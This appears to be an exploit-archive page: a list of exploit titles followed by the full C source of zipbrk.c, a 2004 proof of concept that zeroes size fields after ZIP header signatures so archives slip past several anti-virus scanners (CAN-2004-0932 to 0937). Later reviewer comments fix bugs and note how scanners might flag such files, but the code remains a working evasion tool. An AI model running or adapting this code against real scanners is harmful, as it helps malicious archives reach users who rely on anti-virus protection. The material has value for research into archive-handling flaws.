
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow 
Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
/*
    zipbrk.c - Proof-of-Concept for CAN-2004-0932 - CAN-2004-0937
    Copyright (C) 2004 oc.192

    This program is free software; you can redistribute it and/or modify it under the terms of the GNU
    General Public License as published by the Free Software Foundation; either version 2 of the License,
    or (at your option) any later version.

    This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
    even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License along with this program; if not,
    write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.

    oc.192 phreaker net
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/*
 * Tunables used by the scanner.
 *
 * The two offsets are added to the stream position reported by ftell()
 * right after a 4-byte signature has been consumed, so they are relative to
 * the first byte following the signature, not to the start of the header.
 *
 * NOTE(review): scan_file() applies LOCAL_HEADER_OFFSET after the bytes
 * 50 4B 01 02 and CENTRAL_HEADER_OFFSET after 50 4B 03 04. In the ZIP format
 * the first is the central directory signature and the second the local file
 * header signature, so the two names look swapped; values kept as published.
 */
unsigned short LOCAL_HEADER_OFFSET = 16u;
unsigned short CENTRAL_HEADER_OFFSET = 18u;

/* Not referenced by the code visible in this file; patch_file() writes
 * zero bytes directly rather than reading this value. */
unsigned long DATA_REPLACE_VALUE = 0x00000000UL;
/*
 * Print the banner, the list of advisories this proof-of-concept refers to
 * (with the vendor named next to each identifier) and the command-line
 * synopsis to stdout.
 */
void show_usage()
{
    /* None of these strings contains a conversion specifier, so writing
     * them with fputs() yields the same bytes as printf() would. */
    static const char *const banner[] = {
        "zipbrk - by oc.192 [oc.192@phreaker.net]\n",
        "Attempts to utilize the vulnerabilities described in:\n",
        "CAN-2004-0932 - McAfee\nCAN-2004-0933 - Computer Associates\n"
        "CAN-2004-0934 - Kaspersky\nCAN-2004-0937 - Sophos\n"
        "CAN-2004-0935 - Eset\nCAN-2004-0936 - RAV\n\n",
        " Usage: zipbrk <zip_file>\n",
    };
    size_t idx;

    for (idx = 0; idx < sizeof banner / sizeof banner[0]; idx++) {
        fputs(banner[idx], stdout);
    }
}
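/**
 * Overwrite four consecutive bytes of an open stream with zeros.
 *
 * @param hfile   Stream opened for update (the caller in this file uses
 *                "rb+"). A NULL stream is ignored.
 * @param offset  Absolute byte offset, from the start of the file, of the
 *                first byte to overwrite.
 *
 * The function keeps its void interface; a failed seek or a short write is
 * reported on stdout, in the same "[-] Error:" style the rest of the file
 * uses, instead of being ignored.
 *
 * Changes from the published version: the one-byte heap buffer (whose
 * malloc() result was passed to memset() unchecked) is replaced by a static
 * zero array, the four single-byte writes become one checked fwrite(), and
 * the fseek() result is checked before anything is written.
 *
 * The stream is left positioned after the written bytes. A caller that
 * wants to read again must reposition first, because an update stream
 * requires a positioning call between a write and a following read.
 */
void patch_file(FILE *hfile, unsigned long offset)
{
    static const unsigned char zeros[4] = { 0, 0, 0, 0 };

    if (hfile == NULL) {
        return;
    }

    /* fseek() takes a long; an offset that does not fit shows up as a
     * failed seek and nothing is written. */
    if (fseek(hfile, (long)offset, SEEK_SET) != 0) {
        printf("[-] Error: Unable to seek to 0x%.8lX\n", offset);
        return;
    }

    if (fwrite(zeros, 1, sizeof zeros, hfile) != sizeof zeros) {
        printf("[-] Error: Short write at 0x%.8lX\n", offset);
    }
}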
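/**
 * Scan a file byte by byte for two 4-byte signatures and zero a 4-byte
 * field at a fixed distance after each match, modifying the file in place.
 *
 * @param filename  Path of the file to open with mode "rb+".
 *
 * Matching, as written:
 *   50 4B 01 02 -> position after the signature + LOCAL_HEADER_OFFSET
 *   50 4B 03 04 -> position after the signature + CENTRAL_HEADER_OFFSET
 *
 * NOTE(review): in the ZIP format 50 4B 01 02 is the central directory
 * header signature and 50 4B 03 04 the local file header signature, so the
 * "local"/"central" wording in the names and messages looks swapped.
 * Messages and offsets are kept as published.
 *
 * NOTE(review): the scan does not parse the archive structure; the same
 * byte sequences inside member data would be treated as a header as well.
 *
 * Reviewer context: the advisories named in this file's header concern
 * archive handling in anti-virus products. A scanner that trusts header
 * fields rather than the data it actually reads can disagree with the
 * extractor that later unpacks the file; header fields that contradict the
 * stored data are worth flagging on the scanning side.
 *
 * Changes from the published version: the offset is printed with %lX (it
 * is an unsigned long; %X was a format/argument mismatch), every fread()
 * is checked instead of relying on the previous byte value surviving a
 * failed read, and ftell()/fseek()/fclose() failures are reported.
 */
void scan_file(char *filename)
{
    FILE *hfile = fopen(filename, "rb+");
    unsigned char byte;

    if (hfile == NULL) {
        printf("[-] Error: Unable to open %s", filename);
        return;
    }
    printf("[+] Scanning %s ...\n", filename);

    while (fread(&byte, sizeof(byte), 1, hfile) == 1) {
        unsigned char expected_last;
        unsigned short field_offset;
        const char *label;
        unsigned long offset;
        long pos;

        /* First two signature bytes: 'P' 'K'. */
        if (byte != 0x50) {
            continue;
        }
        if (fread(&byte, sizeof(byte), 1, hfile) != 1) {
            break;
        }
        if (byte != 0x4B) {
            continue;
        }

        /* Third byte selects which record type is being matched. */
        if (fread(&byte, sizeof(byte), 1, hfile) != 1) {
            break;
        }
        if (byte == 0x01) {
            expected_last = 0x02;
            field_offset = LOCAL_HEADER_OFFSET;
            label = "local";
        } else if (byte == 0x03) {
            expected_last = 0x04;
            field_offset = CENTRAL_HEADER_OFFSET;
            label = "central";
        } else {
            continue;
        }

        if (fread(&byte, sizeof(byte), 1, hfile) != 1) {
            break;
        }
        if (byte != expected_last) {
            continue;
        }

        /* perform write */
        pos = ftell(hfile);
        if (pos < 0) {
            printf("[-] Error: Unable to read position in %s\n", filename);
            break;
        }
        offset = (unsigned long)pos + field_offset;
        printf(" [-] Writing %s header patch [0x%.8lX]\n", label, offset);
        patch_file(hfile, offset);

        /* Reposition before the next read: required after a write on an
         * update stream, and it resumes scanning at the patched field. */
        if (fseek(hfile, (long)offset, SEEK_SET) != 0) {
            printf("[-] Error: Unable to seek to 0x%.8lX\n", offset);
            break;
        }
    }

    printf("[+] File scanning finished. EOF:%d ERR:%d\n", feof(hfile), ferror(hfile));

    /* fclose() flushes the pending writes, so its result matters here. */
    if (fclose(hfile) != 0) {
        printf("[-] Error: Unable to close %s\n", filename);
    }
}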
/*
 * Entry point. Expects exactly one argument, the path of the file to
 * process. A wrong argument count, "-h" or "/?" prints the usage text.
 * The exit status is 0 on every path.
 */
int main(int argc, char *argv[])
{
    /* argv[1] is only inspected once argc == 2 has been established. */
    int wants_usage = (argc != 2)
        || strcmp(argv[1], "-h") == 0
        || strcmp(argv[1], "/?") == 0;

    if (wants_usage) {
        show_usage();
    } else {
        scan_file(argv[1]);
    }

    return 0;
}
// milw0rm.com [2004-11-14]